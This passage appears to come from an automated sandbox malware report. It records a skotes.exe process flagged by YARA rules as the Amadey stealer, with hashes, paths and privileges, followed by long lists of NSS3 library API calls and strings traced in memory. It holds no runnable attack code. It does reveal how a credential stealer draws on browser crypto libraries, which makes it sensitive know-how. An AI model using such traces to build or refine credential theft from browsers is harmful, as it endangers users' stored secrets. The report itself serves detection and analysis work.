                                                                                                                                                                                                                                                                                                                    File size:1'947'648 bytes
                                                                                                                                                                                                                                                                                                                    MD5 hash:FA098B363F56394EB669A96201D3521D
                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001E.00000003.1895865210.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001E.00000002.1936159845.00000000003F1000.00000040.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                                                    Target ID:31
                                                                                                                                                                                                                                                                                                                    Start time:04:50:00
                                                                                                                                                                                                                                                                                                                    Start date:27/11/2024
                                                                                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                    Commandline:C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                                    Imagebase:0x3f0000
                                                                                                                                                                                                                                                                                                                    File size:1'947'648 bytes
                                                                                                                                                                                                                                                                                                                    MD5 hash:FA098B363F56394EB669A96201D3521D
                                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001F.00000003.2020656873.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001F.00000002.2522125493.00000000003F1000.00000040.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                                                                                    Target ID:33
                                                                                                                                                                                                                                                                                                                    Start time:04:50:12
                                                                                                                                                                                                                                                                                                                    Start date:27/11/2024
                                                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6740 --field-trial-handle=2272,i,3252984328910052623,10952965601817895583,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                                    Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                                                                                    Reset < >
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PR_CallOnce.NSS3(6CFC2120,6CE77E60), ref: 6CE76EBC
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6CE76EDF
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6CE76EF3
                                                                                                                                                                                                                                                                                                                      • PR_WaitCondVar.NSS3(000000FF), ref: 6CE76F25
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE4A900: TlsGetValue.KERNEL32(00000000,?,6CFC14E4,?,6CDE4DD9), ref: 6CE4A90F
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE4A900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6CE4A94F
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6CE76F68
                                                                                                                                                                                                                                                                                                                      • PORT_ZAlloc_Util.NSS3(00000008), ref: 6CE76FA9
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6CE770B4
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6CE770C8
                                                                                                                                                                                                                                                                                                                      • PR_CallOnce.NSS3(6CFC24C0,6CEB7590), ref: 6CE77104
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CE77117
                                                                                                                                                                                                                                                                                                                      • SECOID_Init.NSS3 ref: 6CE77128
                                                                                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(00000057), ref: 6CE7714E
                                                                                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CE7717F
                                                                                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CE771A9
                                                                                                                                                                                                                                                                                                                      • PR_NotifyAllCondVar.NSS3 ref: 6CE771CF
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6CE771DD
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6CE771EE
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CE77208
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6CE77221
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000001), ref: 6CE77235
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6CE7724A
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6CE7725E
                                                                                                                                                                                                                                                                                                                      • PR_NotifyCondVar.NSS3 ref: 6CE77273
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6CE77281
                                                                                                                                                                                                                                                                                                                      • SECMOD_DestroyModule.NSS3(00000000), ref: 6CE77291
                                                                                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CE772B1
                                                                                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CE772D4
                                                                                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CE772E3
                                                                                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CE77301
                                                                                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CE77310
                                                                                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CE77335
                                                                                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CE77344
                                                                                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CE77363
                                                                                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CE77372
                                                                                                                                                                                                                                                                                                                      • PR_smprintf.NSS3(name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s",NSS Internal Module,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,6CFB0148,,defaultModDB,internalKeySlot), ref: 6CE774CC
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6CE77513
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6CE7751B
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6CE77528
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6CE7753C
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6CE77550
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6CE77561
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6CE77572
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6CE77583
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6CE77594
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6CE775A2
                                                                                                                                                                                                                                                                                                                      • SECMOD_LoadModule.NSS3(00000000,00000000,00000001), ref: 6CE775BD
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6CE775C8
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6CE775F1
                                                                                                                                                                                                                                                                                                                      • PR_NewLock.NSS3 ref: 6CE77636
                                                                                                                                                                                                                                                                                                                      • SECMOD_DestroyModule.NSS3(00000000), ref: 6CE77686
                                                                                                                                                                                                                                                                                                                      • PR_NewLock.NSS3 ref: 6CE776A2
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF298D0: calloc.MOZGLUE(00000001,00000084,6CE50936,00000001,?,6CE5102C), ref: 6CF298E5
                                                                                                                                                                                                                                                                                                                      • PORT_ZAlloc_Util.NSS3(00000050), ref: 6CE776B6
                                                                                                                                                                                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004), ref: 6CE77707
                                                                                                                                                                                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6CE7771C
                                                                                                                                                                                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6CE77731
                                                                                                                                                                                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,rdb:,00000004), ref: 6CE7774A
                                                                                                                                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(?), ref: 6CE77770
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6CE77779
                                                                                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CE7779A
                                                                                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CE777AC
                                                                                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(-0000000D), ref: 6CE777C4
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6CE777DB
                                                                                                                                                                                                                                                                                                                      • strrchr.VCRUNTIME140(?,0000002F), ref: 6CE77821
                                                                                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(?), ref: 6CE77837
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,00000000,00000000), ref: 6CE7785B
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6CE7786F
                                                                                                                                                                                                                                                                                                                      • SECMOD_AddNewModuleEx.NSS3 ref: 6CE778AC
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6CE778BE
                                                                                                                                                                                                                                                                                                                      • SECMOD_AddNewModuleEx.NSS3 ref: 6CE778F3
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6CE778FC
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6CE7791C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CDE204A), ref: 6CE507AD
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CDE204A), ref: 6CE507CD
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CDE204A), ref: 6CE507D6
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CDE204A), ref: 6CE507E4
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: TlsSetValue.KERNEL32(00000000,?,6CDE204A), ref: 6CE50864
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CE50880
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: TlsSetValue.KERNEL32(00000000,?,?,6CDE204A), ref: 6CE508CB
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: TlsGetValue.KERNEL32(?,?,6CDE204A), ref: 6CE508D7
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE507A0: TlsGetValue.KERNEL32(?,?,6CDE204A), ref: 6CE508FB
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      • sql:, xrefs: 6CE776FE
                                                                                                                                                                                                                                                                                                                      • kbi., xrefs: 6CE77886
                                                                                                                                                                                                                                                                                                                      • Spac, xrefs: 6CE77389
                                                                                                                                                                                                                                                                                                                      • dll, xrefs: 6CE7788E
                                                                                                                                                                                                                                                                                                                      • name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s", xrefs: 6CE774C7
                                                                                                                                                                                                                                                                                                                      • extern:, xrefs: 6CE7772B
                                                                                                                                                                                                                                                                                                                      • dbm:, xrefs: 6CE77716
                                                                                                                                                                                                                                                                                                                      • rdb:, xrefs: 6CE77744
                                                                                                                                                                                                                                                                                                                      • NSS Internal Module, xrefs: 6CE774A2, 6CE774C6
                                                                                                                                                                                                                                                                                                                      • ,defaultModDB,internalKeySlot, xrefs: 6CE7748D, 6CE774AA
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: free$strlen$Value$Alloc_ModuleUtil$CriticalSectionstrncmp$CondEnterUnlockcallocmemcpy$CallDestroyErrorLockNotifyOnce$DeleteInitLoadR_smprintfWaitstrrchr
                                                                                                                                                                                                                                                                                                                      • String ID: ,defaultModDB,internalKeySlot$NSS Internal Module$Spac$dbm:$dll$extern:$kbi.$name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s"$rdb:$sql:
                                                                                                                                                                                                                                                                                                                      • API String ID: 3465160547-3797173233
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 80bd46988f60ce32f81ad591614f2ea6414d603d42c47412f13a1f206df53856
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 75bb9fee912c45c3e7c6452c0614fe8c94d3f16cb0870241d38a41b0eb8a93b7
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 80bd46988f60ce32f81ad591614f2ea6414d603d42c47412f13a1f206df53856
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7252EFB1E113019BEB229F64DC45BAB7BB4EF0630CF254029EC19A7B41E771D954CBA2
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3 ref: 6CE9C0C8
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29440: LeaveCriticalSection.KERNEL32 ref: 6CF295CD
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29440: TlsGetValue.KERNEL32 ref: 6CF29622
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29440: _PR_MD_NOTIFYALL_CV.NSS3 ref: 6CF2964E
                                                                                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3 ref: 6CE9C0AE
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29090: LeaveCriticalSection.KERNEL32 ref: 6CF291AA
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29090: TlsGetValue.KERNEL32 ref: 6CF29212
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29090: _PR_MD_WAIT_CV.NSS3 ref: 6CF2926B
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE50600: GetLastError.KERNEL32(?,?,?,?,?,6CE505E2), ref: 6CE50642
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE50600: TlsGetValue.KERNEL32(?,?,?,?,?,6CE505E2), ref: 6CE5065D
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE50600: GetLastError.KERNEL32 ref: 6CE50678
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE50600: PR_snprintf.NSS3(?,00000014,error %d,00000000), ref: 6CE5068A
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE50600: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CE50693
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE50600: PR_SetErrorText.NSS3(00000000,?), ref: 6CE5069D
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE50600: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,9543BF6C,?,?,?,?,?,6CE505E2), ref: 6CE506CA
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE50600: PR_SetError.NSS3(FFFFE8A9,00000000,?,?,?,?,?,6CE505E2), ref: 6CE506E6
                                                                                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3 ref: 6CE9C0F2
                                                                                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3 ref: 6CE9C10E
                                                                                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3 ref: 6CE9C081
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29440: TlsGetValue.KERNEL32 ref: 6CF2945B
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29440: TlsGetValue.KERNEL32 ref: 6CF29479
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29440: EnterCriticalSection.KERNEL32 ref: 6CF29495
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29440: TlsGetValue.KERNEL32 ref: 6CF294E4
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29440: TlsGetValue.KERNEL32 ref: 6CF29532
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29440: LeaveCriticalSection.KERNEL32 ref: 6CF2955D
                                                                                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3 ref: 6CE9C068
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29090: TlsGetValue.KERNEL32 ref: 6CF290AB
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29090: TlsGetValue.KERNEL32 ref: 6CF290C9
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29090: EnterCriticalSection.KERNEL32 ref: 6CF290E5
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29090: TlsGetValue.KERNEL32 ref: 6CF29116
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29090: LeaveCriticalSection.KERNEL32 ref: 6CF2913F
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CE50600: GetProcAddress.KERNEL32(?,?), ref: 6CE50623
                                                                                                                                                                                                                                                                                                                      • _NSSUTIL_UTF8ToWide.NSS3(?), ref: 6CE9C14F
                                                                                                                                                                                                                                                                                                                      • PR_LoadLibraryWithFlags.NSS3 ref: 6CE9C183
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6CE9C18E
                                                                                                                                                                                                                                                                                                                      • PR_LoadLibrary.NSS3(?), ref: 6CE9C1A3
                                                                                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3 ref: 6CE9C1D4
                                                                                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3 ref: 6CE9C1F3
                                                                                                                                                                                                                                                                                                                      • PR_CallOnce.NSS3(6CFC2318,6CE9CA70), ref: 6CE9C210
                                                                                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3 ref: 6CE9C22B
                                                                                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3 ref: 6CE9C247
                                                                                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3 ref: 6CE9C26A
                                                                                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3 ref: 6CE9C287
                                                                                                                                                                                                                                                                                                                      • PR_UnloadLibrary.NSS3(?), ref: 6CE9C2D0
                                                                                                                                                                                                                                                                                                                      • PR_GetEnvSecure.NSS3(NSS_DEBUG_PKCS11_MODULE), ref: 6CE9C392
                                                                                                                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CE9C3AB
                                                                                                                                                                                                                                                                                                                      • PR_NewLogModule.NSS3(nss_mod_log), ref: 6CE9C3D1
                                                                                                                                                                                                                                                                                                                      • PR_GetEnvSecure.NSS3(NSS_FORCE_TOKEN_LOCK), ref: 6CE9C782
                                                                                                                                                                                                                                                                                                                      • PR_GetEnvSecure.NSS3(NSS_DISABLE_UNLOAD), ref: 6CE9C7B5
                                                                                                                                                                                                                                                                                                                      • PR_UnloadLibrary.NSS3(?), ref: 6CE9C7CC
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE097,00000000), ref: 6CE9C82E
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CE9C8BF
                                                                                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(?), ref: 6CE9C8D5
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6CE9C900
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CE9C9C7
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CE9C9E5
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6CE9CA5A
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Monitor$Value$Enter$CriticalExitSection$Error$LeaveLibrary$Alloc_SecureUtilfree$ArenaLastLoadUnloadstrcmp$AddressCallFlagsModuleOnceProcR_snprintfTextWideWithmemcpystrlen
                                                                                                                                                                                                                                                                                                                      • String ID: FC_GetFunctionList$FC_GetInterface$NSC_GetFunctionList$NSC_GetInterface$NSC_ModuleDBFunc$NSS_DEBUG_PKCS11_MODULE$NSS_DISABLE_UNLOAD$NSS_FORCE_TOKEN_LOCK$NSS_ReturnModuleSpecData$PKCS 11$Vendor NSS FIPS Interface$nss_mod_log
                                                                                                                                                                                                                                                                                                                      • API String ID: 4243957313-3613044529
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 154f93a7e015541b331969d5c46b82fbbd98b106db43fef7291f4d9ebf3577ac
                                                                                                                                                                                                                                                                                                                      • Instruction ID: d4d41acf427935f3ab3c6978f3541401b515851b538a2ceb200ac146bcd9fab4
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 154f93a7e015541b331969d5c46b82fbbd98b106db43fef7291f4d9ebf3577ac
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9E425AB2F102049FEB44EF64C847B9B7BB5FB46308F245029D8099BB21E736DA55CB91
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • malloc.MOZGLUE(00000008), ref: 6CF73FD5
                                                                                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CF73FFE
                                                                                                                                                                                                                                                                                                                      • malloc.MOZGLUE(-00000003), ref: 6CF74016
                                                                                                                                                                                                                                                                                                                      • strpbrk.API-MS-WIN-CRT-STRING-L1-1-0(?,6CFAFC62), ref: 6CF7404A
                                                                                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,0000005C,00000000), ref: 6CF7407E
                                                                                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,0000005C,00000000), ref: 6CF740A4
                                                                                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,0000005C,00000000), ref: 6CF740D7
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE890,00000000), ref: 6CF74112
                                                                                                                                                                                                                                                                                                                      • malloc.MOZGLUE(00000000), ref: 6CF7411E
                                                                                                                                                                                                                                                                                                                      • __p__environ.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0 ref: 6CF7414D
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE890,00000000), ref: 6CF74160
                                                                                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6CF7416C
                                                                                                                                                                                                                                                                                                                      • malloc.MOZGLUE(?), ref: 6CF741AB
                                                                                                                                                                                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,NSPR_INHERIT_FDS=,00000011), ref: 6CF741EF
                                                                                                                                                                                                                                                                                                                      • qsort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,00000004,6CF74520), ref: 6CF74244
                                                                                                                                                                                                                                                                                                                      • GetEnvironmentStrings.KERNEL32 ref: 6CF7424D
                                                                                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CF74263
                                                                                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CF74283
                                                                                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CF742B7
                                                                                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CF742E4
                                                                                                                                                                                                                                                                                                                      • malloc.MOZGLUE(00000002), ref: 6CF742FA
                                                                                                                                                                                                                                                                                                                      • FreeEnvironmentStringsA.KERNEL32(?), ref: 6CF74342
                                                                                                                                                                                                                                                                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 6CF743AB
                                                                                                                                                                                                                                                                                                                      • GetStdHandle.KERNEL32(000000F5), ref: 6CF743B2
                                                                                                                                                                                                                                                                                                                      • GetStdHandle.KERNEL32(000000F4), ref: 6CF743B9
                                                                                                                                                                                                                                                                                                                      • FreeEnvironmentStringsA.KERNEL32(?), ref: 6CF74403
